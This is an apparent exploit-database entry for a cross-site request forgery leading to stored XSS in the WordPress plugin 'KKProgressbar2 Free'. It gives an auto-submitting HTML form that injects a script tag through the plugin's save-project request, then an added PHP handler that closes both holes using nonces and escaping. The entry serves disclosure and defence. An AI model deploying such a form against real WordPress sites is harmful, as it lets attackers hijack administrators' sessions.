## https://sploitus.com/exploit?id=WPEX-ID:7B0046D4-CF95-4307-95A5-9B823F2DAAAA
Make a logged-in admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/admin.php?page=kkpb-menu" method="post">
        <input type="hidden" name="action" value="save-project">
        <input type="hidden" name="kkpb_project_name" value='"><script>alert(/XSS/)</script>'>
        <input type="hidden" name="kkpb_project_link" value="csrf">
        <input type="hidden" name="kkpb_project_description" value="<p>csrf</p>">
        <input type="hidden" name="kkpb-auto" value="on">
        <input type="hidden" name="kkpb_procent" value="0">
        <input type="hidden" name="kkpb-input-name[]" value="">
        <input type="hidden" name="kkpb-input-auto[]" value="">
        <input type="hidden" name="kkpb-input-progress[]" value="">
        <input type="hidden" name="kkpb-input-all[]" value="">
        <input type="hidden" name="kkpb-input-now[]" value="">
        <input type="hidden" name="kkpb-input-status[]" value="1">
    </form>
</body>
```

The XSS will trigger on the "KKProgressbar2 Free" menu.
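The form above works because the `save-project` POST carries no anti-CSRF token and `kkpb_project_name` is echoed back unescaped. The following is an added example of a handler that closes both gaps with WordPress core APIs; it is not the plugin's own code or its actual patch. The `kkpb_example_*` function names, the nonce action and field names, and the option name are hypothetical.

```php
<?php
// Added example, not the plugin's code. All kkpb_example_* names, the nonce
// identifiers and the option name below are hypothetical.
const KKPB_EXAMPLE_NONCE_ACTION = 'kkpb_example_save_project';
const KKPB_EXAMPLE_NONCE_FIELD  = 'kkpb_example_nonce';
const KKPB_EXAMPLE_OPTION       = 'kkpb_example_project';

// Call inside the admin <form> so every legitimate POST carries a token
// bound to the current user and session.
function kkpb_example_render_nonce() {
    wp_nonce_field( KKPB_EXAMPLE_NONCE_ACTION, KKPB_EXAMPLE_NONCE_FIELD );
}

function kkpb_example_handle_save() {
    if ( ! isset( $_POST['action'] ) || 'save-project' !== $_POST['action'] ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // Dies unless the POST contains a valid nonce. A cross-site form cannot
    // read the token, so the auto-submitting page is rejected here.
    check_admin_referer( KKPB_EXAMPLE_NONCE_ACTION, KKPB_EXAMPLE_NONCE_FIELD );

    $post    = wp_unslash( $_POST );
    $project = array(
        // Strips tags and control characters before storage.
        'name'        => sanitize_text_field( $post['kkpb_project_name'] ?? '' ),
        'link'        => esc_url_raw( $post['kkpb_project_link'] ?? '' ),
        // Description is HTML, so allow only the post-content tag whitelist.
        'description' => wp_kses_post( $post['kkpb_project_description'] ?? '' ),
        'percent'     => max( 0, min( 100, (int) ( $post['kkpb_procent'] ?? 0 ) ) ),
    );
    update_option( KKPB_EXAMPLE_OPTION, $project );
}
add_action( 'admin_init', 'kkpb_example_handle_save' );

// Escape at output as well: a value like "><script>... stays inside the
// attribute even if it reached storage through some other path.
function kkpb_example_render_name_input() {
    $project = get_option( KKPB_EXAMPLE_OPTION, array( 'name' => '' ) );
    printf(
        '<input type="text" name="kkpb_project_name" value="%s">',
        esc_attr( $project['name'] )
    );
}
```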